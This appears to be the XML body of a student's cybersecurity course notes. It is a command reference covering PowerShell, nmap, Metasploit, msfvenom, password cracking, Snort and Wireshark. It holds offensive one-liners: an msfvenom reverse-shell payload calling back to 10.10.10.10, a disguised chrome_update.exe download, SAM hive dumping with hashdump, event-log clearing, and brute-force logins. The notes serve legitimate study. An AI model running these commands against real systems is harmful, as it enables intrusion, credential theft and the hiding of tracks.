            <wp:extent cx="6237515" cy="1607066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14398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4320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6268583" cy="1615071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABC8FD" w14:textId="7555F486" w:rsidR="00CE3331" w:rsidRDefault="00CE3331" w:rsidP="00CE33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of the for loop is to take info on ip by using tools like nmap and masscan, by using &amp; in the end of the loop, it is does the scanning on all the ips in the list simultaneously and save time, by wait command, it wait for the process to end before continue to the next command s in the automation, by timeout 30 , it limit the scan for 30 seconds, by using ${ip}_nmap.txt it know to refer to the ip variable and not search for ip_nmap variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AC3A" w14:textId="77777777"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9607" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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B8F07" w14:textId="7322EB1A" w:rsidR="00F36876" w:rsidRPr="000C387E" w:rsidRDefault="00F36876" w:rsidP="00F3687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Powershell </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p w14:paraId="3F66CB5D" w14:textId="6AE5C162" w:rsidR="002F60DB" w:rsidRDefault="00F613E9" w:rsidP="00FF6A8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hostname - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F61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network name of the current computer</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Out-GridView</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underrated command for open the ouput in comfortable GUI and use text manipulation, recommended when need to deal with the same output for a while</w:t>
      </w:r>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get all the items (files and directories) in my current location</w:t>
      </w:r>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measure – counts the items (similar to wc -l)</w:t>
      </w:r>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Get-Location – show my current location (similar to pwd)</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Get-FileHash .\.node_repl_history -Algorithm md5</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md5 hash of a file</w:t>
      </w:r>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-commandtype cmdlet – show all the cmdlet commands</w:t>
      </w:r>
      <w:r w:rsidR="005578F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-name “*invoke*” – find all the commands that contains the string “invoke”</w:t>
      </w:r>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Get-Help Invoke-Webrequest -examples – will show examples of use this command</w:t>
      </w:r>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Get-Alias cd – show the parallel command in powershell</w:t>
      </w:r>
      <w:r w:rsidR="008A0F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get the content of the file (similar to cat)</w:t>
      </w:r>
      <w:r w:rsidR="00024C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Select-Object -Index 994 – get line 995 from the file (count from 0)</w:t>
      </w:r>
      <w:r w:rsidR="00C874E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Get-Date – get the current date</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Get-NetTCPConnection</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machine</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Get-NetUDPEndpoint</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 UDP ports (it is not called connections cause in UDP there is not 3-way handshake, meaning there is not process of connection)</w:t>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 -Recurse | Get-FileHash -Algorithm MD5 | Out-GridView</w:t>
      </w:r>
      <w:r w:rsid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files recursively (also those inside the directories) from you location, find their md5 hash and open GUI to see the output, and filter the output in more comfortable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3D4EC" w14:textId="0420F86A" w:rsidR="002C5B72" w:rsidRDefault="002C5B72" w:rsidP="00F613E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-File | Sort-Object Length -Descending | Select-Object -First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only the file in my current location then sort them by length in descending order, and output the first</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 show only files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-Directory – show only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-Recurse – search recursively (inside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 – search by name</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Sort-Object length -Descending – sort all the objects by length in Descending order</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Select-Object -First 1 – output only the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F828776" w14:textId="5E9FF2B4" w:rsidR="008E6B86" w:rsidRDefault="007B0372"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-Recurse -File -Filter "auth.log" | Select-Object Mode, LastWriteTime, Length, Name, FullName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recursively the auth.log file and show only info on it as </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and more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 – search for the name of the file</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Fullname – full path for the file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LastWriteTime – the last time the file was changed</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Length – the size of the file </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00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show all the processes and show stats</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sort -Property cpu</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all the processes by cpu column</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C4B7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-Property</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 – sort by column cpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566321D" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="008E6B8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Where-Object{$_.ProcessName -eq "lsass"}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line of the process named lsass (by the column ProcessName)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Get-Process | Where-Object{$_.ProcessName -eq "lsass"} | Select-Object Name,Path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only the properties name and path of the process lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F7EB9" w14:textId="2DC7C0D2" w:rsidR="00B64404" w:rsidRDefault="00B64404" w:rsidP="00D372E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Get-AD… - </w:t>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to have the Active Directory module installed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Identifier (RID) is part of the security identifier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Get-ADGroup – find RID of the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Get-ADUser donna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RID of the user donna</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 -Filter * | Where-Object { $_.SID.Value -match '-501$'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all the ADUsers its find the one with RID 501</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Get-ADUser -Filter * -Properties PasswordLastSet – shows the last time the password</w:t>
      </w:r>
      <w:r w:rsidR="009D4D4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Get-ADComputer -filter * - show all the computers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969441C" w14:textId="77777777" w:rsidR="00CC6C94"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Get-Service – get all the services and their status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EAC90" w14:textId="77777777" w:rsidR="00FE275B"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Get-volume – get data on hard disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6580D9" w14:textId="55A819DF" w:rsidR="00D85A07" w:rsidRDefault="00D85A07"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A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Get-ExecutionPolicy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my policy</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levels between restricted to </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sidR="001E4F2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levels</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every script can run</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does not even alert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unrestricted means every script can run, but it d</w:t>
      </w:r>
      <w:r w:rsidR="003728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oes prompt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restricted means no scripts are allowed to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF3F34" w14:textId="5C42A07C" w:rsidR="00495A6E" w:rsidRPr="00BB17D9" w:rsidRDefault="00495A6E" w:rsidP="00BB17D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Get-WinEvent -Path .\log.evtx – read event file</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the name of the event)</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Get-WinEvent -Path .\log.evtx | Format-List – read the event file with the content of every event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EB194"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Set-Location favorites – go inside favorites directory (similar to cd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35FCAC" w14:textId="52F7AB2A" w:rsidR="00045548" w:rsidRPr="00045548" w:rsidRDefault="00045548" w:rsidP="0004554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Select-String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auth.log</w:t>
      </w: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140.206.157.242 | Measure-Object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amount of times th</w:t>
      </w:r>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ip show in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917E50C"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Invoke-Webrequest -Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001F35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http://10.10.10.10:1212/chrome_update.exe</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c:\users\...\chrome.exe – ask from the ip 10.10.10.10 in port 1212 (the port need to be open already) the file chrome_update.exe and name it as chrome.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74C44" w14:textId="77777777" w:rsidR="00061C0E" w:rsidRDefault="00A625A1" w:rsidP="00A625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with 8.8.8.8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connection, but return more info then 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Test-NetConnection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more info on the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D235AB" w14:textId="20FDFCFF" w:rsidR="00FE275B" w:rsidRDefault="00061C0E" w:rsidP="000E615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displaying information directly to the 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cant save info with that command into a variable or file</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E6152" w:rsidRPr="008F37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Write-Output – print the data, also enable us to save the info inside a file or variable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Write-Output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“hello</w:t>
      </w:r>
      <w:r w:rsidR="000E6152" w:rsidRP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Out-File "file.txt"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hello, and also save it into a file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hello – find string hello in a file</w:t>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findstr /I hello – ignoring case sensitive find the string hello in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D00C87" w14:textId="696EB14D" w:rsidR="00065E66" w:rsidRDefault="00065E66"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-ErrorAction SilentlyContinue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flag used in script to continue the script even if there is an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F48350E" w14:textId="312642C5" w:rsidR="00F43B9B" w:rsidRDefault="00F43B9B"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B9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/priv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get info about the user and its privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9888F" w14:textId="17D9412F" w:rsidR="002327B6" w:rsidRDefault="002327B6" w:rsidP="002327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7B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save hklm\sam sam</w:t>
      </w:r>
      <w:r w:rsidR="007266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sam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327B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save hklm\system system</w:t>
      </w:r>
      <w:r w:rsidR="007266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cretate system file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14590F47" w14:textId="18C8794F" w:rsidR="003D0B21" w:rsidRPr="000C387E" w:rsidRDefault="003D0B21" w:rsidP="003D0B2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Msfconsole</w:t>
      </w:r>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CEDA82A" w14:textId="731A1108" w:rsidR="003D0B21" w:rsidRDefault="003D0B21"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msf6 – command line of msfconsole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auxiliary – a piece of code with specific meaning such as connect in anonymous to ftp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payload – type of communication such as reverse_tcp or bind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encoder – help us to hide the payload for we will not be detected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post exploitation – we will use that after we got a session, for get more date or improve the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090412D" w14:textId="3C83476C" w:rsidR="006E5D31" w:rsidRDefault="00F06909"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type:auxiliary – for specific something we want to get and not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type:exploit – for scripts for exploits and get a session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type:post – for scripts for upgrade sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A62CFF" w14:textId="53A7144F" w:rsidR="00460961" w:rsidRDefault="006E5D31" w:rsidP="0001024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8 – use one of the script in the list</w:t>
      </w:r>
      <w:r w:rsidR="004B74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info – will give me info on the option we choose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options – search which </w:t>
      </w:r>
      <w:r w:rsidR="00D141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enter</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show payloads – show which payload we can choose</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payload</w:t>
      </w:r>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rhost … - define the ip to attack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run/exploit – run the sript</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 -j – run as job in the background, like when opening a port and waiting for the target to talk to us</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jobs – show all the jobs in the background</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bg/background – save the session in the background so we can do other things as attack other hosts</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new sessions </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 the current sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D5E7" w14:textId="11CAF6EE" w:rsidR="003D3CFF" w:rsidRDefault="00460961"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shell to meterpreter type:post – search for upgrade the session</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sessions -u 2 – try to upgrade session 2</w:t>
      </w:r>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shell_to_meterpreter – it is post exploitation, for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="000429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suggester – suggest us what to use for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="005C2B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11E3E6" w14:textId="6BE12C36" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B"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multi/handler – </w:t>
      </w:r>
      <w:r w:rsidR="002A76A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metasploit module,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listener</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reverse payloads to create session with you</w:t>
      </w:r>
      <w:r w:rsidR="004254A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machine</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 7 – for choose the right option</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same payload you chose when created the file in msfvenom</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BD19E71" w14:textId="6E1DD5D2" w:rsidR="00A74E5E" w:rsidRDefault="00A74E5E"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 commands:</w:t>
      </w:r>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getuid – get user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getpid – get the current process indentifier</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ps – list of the processes</w:t>
      </w:r>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sysinfo – find data on the system such as hostname</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shell – we can use that to get a shell</w:t>
      </w:r>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hashdump – hashes of the passwords of the users</w:t>
      </w:r>
      <w:r w:rsidR="005033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migrate -N svchost.exe – migrate to another process by its name to get privileged </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clearev – clear the events log</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execute – execute a command</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reboot – reboot the computer</w:t>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pgrep – search string as grep command</w:t>
      </w:r>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-f accounts.txt – find a path to this file (similar to find command in linux)</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reg save HKLM\sam c:\sam.hiv – save the file sam.hiv on the computer than you can download it from there</w:t>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download sam.hiv – download this file to our machine</w:t>
      </w:r>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samdump2 system.hiv sam.hiv -o secret_win – make hashdump from the files system.hiv and sam.hiv we downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C3AF" w14:textId="17566737" w:rsidR="00614931" w:rsidRDefault="006C63AB"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msfvenom --list payloads | grep meterpreter – give a list of meterpreter payloads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msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=7878 -f exe </w:t>
      </w:r>
      <w:r w:rsidR="002735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w:t>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002735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 – create payload and name it </w:t>
      </w:r>
      <w:r w:rsidR="006337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file4.</w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00CD1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reverse payload so we need the target to turn this file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AFB0E" w14:textId="05F76AAC" w:rsidR="00E34555" w:rsidRDefault="00E34555"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msfdb init – create postgresql database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 shows all the workspaces that exist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-a hello – add new workspace called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default – switch to the default workspace called default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hosts -c address – the flag -c behave as awk and find the address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services -S ‘vsftpd’  - behave as grep and search vsftpd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db_nmap 10.10.10.10 -p 21 -sV – save the results to the DB of </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db_export /path/file.xml – export the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96E133" w14:textId="3E188790" w:rsidR="00FF42A0" w:rsidRDefault="00FF42A0"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auxiliary/admin/smb/ms17_010_command – auxiliary for exploit smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E4C7B" w14:textId="567EA552" w:rsidR="005C2B40" w:rsidRDefault="000D61EA"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command “powershell Get-NetFirewallProfile” – when we want to run powershell command, we need first to write powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279651E6" w14:textId="1032A3A5" w:rsidR="00377343" w:rsidRDefault="00377343" w:rsidP="0037734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773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smb_login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list of users or user, and list of passwords or password as input, and brute force until find the right credentials for smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A46724" w14:textId="77777777" w:rsidR="0096541F" w:rsidRDefault="0096541F"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0BA6B" w14:textId="5A6F6A8A" w:rsidR="005C2B40" w:rsidRPr="000C387E" w:rsidRDefault="005C2B40" w:rsidP="005C2B40">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3771259" w14:textId="44A2A3F7" w:rsidR="005C2B40" w:rsidRPr="004456B5" w:rsidRDefault="002C1548"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 – network shell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etsh advfirewall</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show rule name=ICMP_allow – shows data on the predefined rule called ICMP_allow</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delete rule name=all – delete all the rules</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add rule name = allow_server dir=in action=allow remoteip = 10.10.10.10 – allow incoming traffic from the ip 10.10.10.10</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netsh advfirewall firewall add rule name=accept_443 protocol=TCP dir=out localport=80 action=allow – enable communication outside in port 80 in TCP protocol </w:t>
      </w:r>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set rule name=Allow_ICMP dir =in new action=block protocol=ICMPv4 – change exist rule (set command) to block ping</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F8194" w14:textId="77777777" w:rsidR="001A6FC4" w:rsidRDefault="001A6FC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953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E2328"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0BFE4"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D627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61105" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00892789"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248F1" w14:textId="77777777" w:rsidR="00502E69" w:rsidRPr="00502E69" w:rsidRDefault="00502E69"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DF0B0" w14:textId="2137E2C5" w:rsidR="000C387E" w:rsidRPr="000C387E" w:rsidRDefault="000C387E" w:rsidP="000C387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208A4CE" w14:textId="189C453A" w:rsidR="00132564" w:rsidRPr="00132564" w:rsidRDefault="00296C76" w:rsidP="00BF783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 scans the default 1000 ports on the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10.10.10.10 -Pn – does not use ping before scanning the ip, it assumes the destination exist, sometimes there are destinations that block ping, and the default for nmap is that when it does not find the host is active It won’t search for open ports so we want to use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 - scans all the ports (</w:t>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65,535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10.10.10.10 -F – scan the default 100 ports</w:t>
      </w:r>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10.10.10.10 -sV – scan service versions</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10.10.10.10 -sn – check if the host is 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 – scan only rdp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3389,22,53 – scan few ports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20 - 100 – scan range of ports</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10.10.10.10/24 – scan all the subnet</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BE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--open – shows in the output only open ports</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--script=vulners.nse</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must to come with -sV for have the versions of the machine it scan, the script check the version of the services of the machine, and check if there is already known vulnerability by checking in the v</w:t>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ulners database</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r w:rsidR="00F806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ftp-anon.nse – check if anonymous is user in the target (in ftp)</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--script=ftp-brute.nse</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try connect to ftp using common and simple credentials</w:t>
      </w:r>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--script=smb-os-discovery – exploit the smb service to try to get data as hostname, operating system, domain name and more.</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 is shorthand of </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tell nmap to run a default set of basic scripts of nmap for get info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8D174" w14:textId="0C6A00C2" w:rsidR="003D0295" w:rsidRDefault="003E0EA2" w:rsidP="0034107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10.10.10.10 -p 80 -sS -Pn -n –disable-arp-ping –packet-trace -D RND: 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-sS send syn packet without completing the 3-way handshake</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stealthier and faster than a full TCP connection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skip the host resolution which make the scanning faster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–disable-arp-ping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disable arp ping discovery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–packet-trace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all the packets sent and receive during the scanning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RND:5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5 decoys of ip for harden on the target to scan the real ip scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2DB64" w14:textId="2D6459CC" w:rsidR="00021236" w:rsidRDefault="0062373E" w:rsidP="0034107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 –</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 UDP ports</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UDP scans are usually slower</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UDP does not send back error messages when a port is closed, unlike TCP</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-T3 – between 0-5 speed of scanning, when 5 you may lose packets and you are not stealth, and T0 is slow and more stealth.</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-oG – output greppable</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 output normal</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-oX – output XML (the only output provide the most info)</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-sV</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 output-file.txt</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in greppable format to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0ACCFB" w14:textId="01C2EE41" w:rsidR="00021236" w:rsidRDefault="006B420E"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 – scan the ports by its order and not random</w:t>
      </w:r>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 – find os</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 – specify non standard port</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 – for file of</w:t>
      </w:r>
      <w:r w:rsidR="000550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of</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to attack</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 – specify to stop attack after found right credentials</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4 – specify the amount of attacks parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DC988" w14:textId="06D25D07" w:rsidR="00D8498F" w:rsidRPr="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="00D8498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nmap "$ip" -sV -F | grep open | awk '{for (i=4; i&lt;=NF; i++) printf "%s ", $i; print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scan for 30 seconds, show only from column 4 to the last column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35501F3E" w14:textId="20E73325" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="006234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masscan "$ip" -p U:1-100</w:t>
      </w:r>
      <w:r w:rsidR="00B102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time of the scan to 30 seconds, and scan all the port between 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA273F5" w14:textId="77777777" w:rsidR="00D8498F" w:rsidRDefault="00D8498F"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678E" w14:textId="77777777" w:rsidR="00E204D2" w:rsidRDefault="00E204D2"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944FA" w14:textId="7DD1C3D6" w:rsidR="00723AB1" w:rsidRPr="000C387E" w:rsidRDefault="00723AB1" w:rsidP="00723AB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51E60F64" w14:textId="725B8A7A" w:rsidR="00723AB1" w:rsidRDefault="00723AB1"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 4 7 1234hd &gt;&gt; file.txt – minimum 4 chars, maximum 7 chars, the possible chars are 1234hd, save all the options of passwords to file.txt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small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big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numbers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symbols</w:t>
      </w:r>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crunch 7 7 -t lior^^^ &gt;&gt; symbol.txt – the flag -t has to come when using char that replace group of characters as ^, the file will contain lior (constant) word then more 3 symbols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52C8E3" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C6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B1D9"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9E26A" w14:textId="481114FA" w:rsidR="0044046E" w:rsidRPr="000C387E" w:rsidRDefault="0044046E" w:rsidP="0044046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The Ripper</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7213275C" w14:textId="22B6156D"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john /etc/shadow – try to crack the /etc/shadow file while using it default list of passwords called password.lst, it will success only if the word very common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--wordlist = ./new_list.txt – use the list of passwords to crack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/etc/shadow --wordlist = ./new_list.txt --format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 – use the list of passwords to crack the file and use the format we wrote</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--format  = crypt --show – it will show the password we already cracked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B283D60" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="00FC205C"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rar2john crackme.rar &gt;&gt; hash.txt – save the hash of the password of the file, the same for files like zip2john, pdf2john, 7z2john, then all left is to crack it with john or other tools.</w:t>
      </w:r>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bitlocker2john -i locked.vmdk &gt; hash.txt - extract hash of password of memory file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CD9F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0E090"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F8B1C"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A026F"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ABAD1"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65640"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D62E"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E4EBB"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7F13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433" w14:textId="28DCC5D9" w:rsidR="009F3651" w:rsidRPr="000C387E" w:rsidRDefault="009F3651" w:rsidP="009F365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Snort</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8C5645A" w14:textId="5FC59EB3" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00C748A1">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IDS/IPS snort – it’s a tool for creating rules to pop up an alert when something </w:t>
      </w:r>
      <w:r w:rsidRP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happens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part of cisco, it</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many types of fields as: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msg – the message will pop up</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sid – snort ID, the id of the rule</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offset – from each byte start to check</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depth –  how many bytes to investigate</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content – which string to search</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rev – which version of the rule (we need to change manually the number when we change the rule so we could track on it)</w:t>
      </w:r>
      <w:r w:rsid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125AA" w:rsidRP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nocase</w:t>
      </w:r>
      <w:r w:rsid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w:t>
      </w:r>
      <w:r w:rsidR="009125AA" w:rsidRP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ndicates that the content match should ignore case</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flow:established,to_server</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Specifies that this rule only applies to established connections heading toward the server</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detection_filter:track by_src, count 30, seconds 60</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 the number of matches to 30 within 60 seconds per source IP address, helping to reduce false positives or limit alert flooding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D5D26" w14:textId="3D0E90D5" w:rsidR="007804A1" w:rsidRDefault="007804A1" w:rsidP="007804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 pop a message in a case the rule found match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drop – in addition to alert, it uses IPS (</w:t>
      </w:r>
      <w:r w:rsidRPr="007804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intrusion prevention system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discard the packets so the receiver will not get the packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC5523" w14:textId="77777777" w:rsidR="00110024" w:rsidRDefault="00EA275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ICMP 10.10.10.10 any -&gt; any any (msg: “ICMP attempt attack”; sid:1000005) – alert us if the ip 10.10.10.10 from any port exist will talk to any ip in every port in icmp message, </w:t>
      </w:r>
      <w:r w:rsidR="001100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will pop the message “ICMP attempt attack”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDA54B" w14:textId="77777777" w:rsidR="007804A1" w:rsidRDefault="00110024"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TCP 10.10.10.10/24 any -&gt; any any (content:”HTTP”; offset:4; depth:40; msg:”HTTP matched”;) – if there is tcp communication between every ip in10.10.10.10/24 in every port to any ip in any port, it will check between 5-44 bytes and search for HTTP string, if found I will pop the message  “HTTP matched”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABF48C" w14:textId="1E2F01BB" w:rsidR="004B0D4A" w:rsidRPr="009C77E4" w:rsidRDefault="007804A1" w:rsidP="004B0D4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4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tcp any any &gt; 172.16.100.20 22 (msg:"SSH Under Attack";flow:established,to_server; content:"SSH"; nocase; offset:0; depth:4; detection_filter:track by_src, count 30, seconds 60; sid:1000021; rev:1;)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A6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&gt; - </w:t>
      </w:r>
      <w:r w:rsidR="001A6792" w:rsidRPr="001A6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traffic direction is inbound to the host or network specified</w:t>
      </w:r>
      <w:r w:rsid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
    <w:p w14:paraId="1BF3FF4F" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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8515" w14:textId="77777777" w:rsidR="00883A17" w:rsidRPr="00294C81" w:rsidRDefault="00883A17" w:rsidP="00883A17">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA14B4" w14:textId="436F8278" w:rsidR="008C066C" w:rsidRDefault="00480370" w:rsidP="0048037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(may not respond even where there is a connection if the destination block the ICMP protocol)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ping -a 8.8.8.8 – check the connection and resolve to hostname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tasklist – shows processes that running on the machine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 /? – shows all the options of taskkill command, like -h in linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD2D0C" w14:textId="77777777" w:rsidR="00883A17" w:rsidRDefault="00883A17" w:rsidP="00883A1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 – clear the cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF66F90" w14:textId="0589AED8" w:rsidR="003000B5" w:rsidRDefault="00883A17" w:rsidP="00E4246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 shows a list of users</w:t>
      </w:r>
      <w:r w:rsidR="00C567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 user administrator – show info the user administrator as local group and last logon and more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0B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soc 123 /add – add new user called soc with the password 123</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CyberJunkie /delete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the user</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25D14" w:rsidRP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1234 -change password of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/active:yes</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enable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/active:no</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disable user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14186B5D"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 search for a word like grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AC6B5"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print the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD5EF8" w14:textId="31C19A23"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 – display network config</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/displaydns – show all the dns resolver cache, all the ip addresses the dns resolved and saved it for better search in the next time</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ipconfig /release – return you ip address (you will lost connection)</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ipconfig /renew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for new ip address</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tracert 8.8.8.8 – show all the path in the way to get to this ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE23C0B" w14:textId="2E2638E1" w:rsidR="003000B5" w:rsidRDefault="00E96AF9" w:rsidP="003000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show current path, like pwd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cd .. – go back one directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B61E0" w14:textId="68592A7D" w:rsidR="003715FF"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 – show</w:t>
      </w:r>
      <w:r w:rsidR="003715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directories, like ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4120C" w14:textId="77777777" w:rsidR="0043317B" w:rsidRDefault="003715FF" w:rsidP="003715F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 enter a file, like cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF829B" w14:textId="75AF6B1D" w:rsidR="00804B18" w:rsidRDefault="00804B18"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-ano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-a – know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tells netstat to display all connections and listening ports. It includes both TCP and UDP ports, regardless of their state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instructs netstat to display addresses and port numbers in numerical form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default, netstat attempts to determine and display the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remote address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adds the Process ID (PID) associated with each connection to the output. This is crucial for identifying which processes on your system are creating which connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C950AD" w14:textId="59672F0E" w:rsidR="00CC4C4B" w:rsidRDefault="00CC4C4B"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all the tasks/processes and their PID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taskkill /PID 5072 – stop the process PID 5072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B16A" w14:textId="5F8B6912" w:rsidR="00C4612C" w:rsidRDefault="00FF725F" w:rsidP="00B7251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copy/b pic.jpg+sec.zip pic1.jpg </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hide </w:t>
      </w:r>
      <w:r w:rsidR="00A04B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zip </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in </w:t>
      </w:r>
      <w:r w:rsidR="00CB46FF" w:rsidRP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steganography</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 /r – for see files that hidden in ADS</w:t>
      </w:r>
      <w:r w:rsidR="00B7251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2511" w:rsidRPr="00B7251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Data Streams</w:t>
      </w:r>
      <w:r w:rsidR="00B7251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notepad vac7.jpg:secret.txt – open the text hidden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mspaint vac7.jpg:pic.jpg – open the </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hidden file</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firefox.ink F:\ADS\vac7.jpg:bomb.pdf – open the pdf hidden file</w:t>
      </w:r>
      <w:r w:rsidR="008A7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type vac2.jpeg &gt; vac1.jpeg:vac2.jpeg – hide the file vac2.jpeg behind vac1</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ADS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F849334" w14:textId="77777777" w:rsidR="000E1FB5" w:rsidRDefault="00C4612C"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mftdump.exe $MFT /o mf.txt – convert the $MFT to text file (need the mftdump.exe file for that) than you can drag the text file to the excel and see the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363FF3A" w14:textId="7FB52F69" w:rsidR="00296C76" w:rsidRDefault="00883A17"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5E27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0244ACA" w14:textId="77777777" w:rsidR="005E279D" w:rsidRDefault="005E279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1B16" w14:textId="4FEC0C90" w:rsidR="00C97ECA" w:rsidRPr="00C97ECA" w:rsidRDefault="00C97ECA" w:rsidP="00C97EC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 filter syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C4D3A" w14:textId="7389AB10" w:rsidR="002D2B47" w:rsidRDefault="005E279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 == 10.10.10.10</w:t>
      </w:r>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ip.dst == 10.10.10.10</w:t>
      </w:r>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ip.addr == 10.10.10.10 – search for packets with this ip address in source or destination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eth.src ==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packets with this source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eth.dst == (MAC address) – search packets with this destination MAC address</w:t>
      </w:r>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eth.addr == 08:8A… - search for packets that with this MAC address in source or destination</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dns.qry.name == “xxx.com” – search for domain name</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udp.port == 5355 – scan for specific udp port</w:t>
      </w:r>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tcp.port == 445 – scan for specific tcp port</w:t>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4 – search for only ipv4 packets</w:t>
      </w:r>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6 – search for only ipv6 packets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frame contains “login” – search for packets that contain the wor</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http.request.method == “GET” &amp;&amp; ip.src == 10.10.10.10 – filter for all the packets with get that specific ip shows there</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http.request.uri contains “.gif” – search for specific word inside http protocol</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tcp.flag.syn == 1 &amp;&amp; tcp.flag.ack == 0 – shows all the packets that syn is defined but ack does not, which happen when someone scanning ports</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not arp –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 packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F00461"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88989"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46500"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9B18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62D5"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EC042"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74C57"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AB866"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A1A1C"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9CFAD"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F21F5"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EE357"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1C59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64A1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180BB"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991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714E"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C23E8" w14:textId="13C3E844" w:rsidR="00847C8A" w:rsidRPr="00C97ECA" w:rsidRDefault="00847C8A" w:rsidP="00847C8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syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F7DDB" w14:textId="440141B0" w:rsidR="00847C8A" w:rsidRDefault="00660D7F"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 a CLI for wireshark, you can use it for make automations or search for thing more easily.</w:t>
      </w:r>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when hardening to find the right filter, you can use wireshark and choose the wanted field, choose “use as filter” and you will see the syntax, th</w:t>
      </w:r>
      <w:r w:rsidR="00ED03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you can write this filter in -Y flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC2B4" w14:textId="2E12FF44" w:rsidR="00DE0241" w:rsidRDefault="00E957E7"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-I eth0 – capture packets (you cant use in this terminal during this time)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-I eth0 -w class.pcap – show the amount of packets it captured and write it to this file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 flag for sniff packets</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 – flag for use exist file of packets</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-Y/--display-filter - -Y is a shorthand of --display-filter, it filter as the syntax of wireshark filter</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flag for get certain field inside the packets</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-z – flag for the statistics of wireshark</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--export-objects – flag for extract files</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E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 fields – for specify </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type of info</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for name the field, type -e for every field</w:t>
